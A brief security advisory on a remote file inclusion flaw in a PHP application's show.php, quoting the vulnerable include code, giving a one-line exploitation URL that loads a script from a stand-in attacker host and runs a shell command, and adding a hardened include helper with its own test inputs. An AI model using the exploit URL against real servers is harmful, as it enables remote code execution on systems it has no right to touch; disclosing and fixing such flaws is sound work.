Discussion:
The bug resides in show.php
Vulnerable Code:
$CFG['SDIR'] = $path;
$CFG['CDIR'] = $CFG['SDIR']."./common";
require_once($CFG['CDIR']."/error.php");
require_once($CFG['CDIR']."/init.php");
Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a
Contact the Vendor
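A hardened form of the include logic shown under "Vulnerable Code", as an added example that is not the vendor's code or part of the original advisory. It assumes $path reaches show.php from the request, as the exploitation URL suggests; resolve_include and the temporary sandbox directory are hypothetical names used for illustration.

```php
<?php
// Added example (not the vendor's code): pin the include directory on the
// server and verify every include target stays inside it.
// Defense in depth: also set allow_url_include=Off in php.ini.

/** Hypothetical helper: return the real path of $file inside $commonDir or throw. */
function resolve_include(string $commonDir, string $file): string
{
    // Refuse scheme prefixes (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file) || strpos($file, "\0") !== false) {
        throw new RuntimeException("rejected include target: $file");
    }
    $root   = realpath($commonDir);
    $target = realpath($commonDir . DIRECTORY_SEPARATOR . $file);
    // realpath() collapses ../ sequences and symlinks; the result must still be under $root.
    if ($root === false || $target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("rejected include target: $file");
    }
    return $target;
}

// In show.php the base directory would be fixed, never read from the request:
//   $CFG['SDIR'] = __DIR__;
//   $CFG['CDIR'] = $CFG['SDIR'] . '/common';
//   require_once resolve_include($CFG['CDIR'], 'error.php');
//   require_once resolve_include($CFG['CDIR'], 'init.php');

// Constructed sandbox so the example runs on its own.
$sdir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($sdir . '/common', 0700, true);
file_put_contents($sdir . '/common/error.php', "<?php // constructed stub\n");
file_put_contents($sdir . '/secret.php', "<?php // outside common/\n");

// Constructed inputs: a legitimate file, a URL of the kind in the advisory, a traversal.
foreach (['error.php', 'http://evilserver/cmd.gif?', '../secret.php'] as $candidate) {
    try {
        echo "accepted: ", resolve_include($sdir . '/common', $candidate), "\n";
    } catch (RuntimeException $e) {
        echo $e->getMessage(), "\n";
    }
}
```

Only error.php is accepted; the URL is refused by the scheme check and the traversal by the realpath() containment check.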
===========================================================
Aria Security Research
Http://www.aria-security.net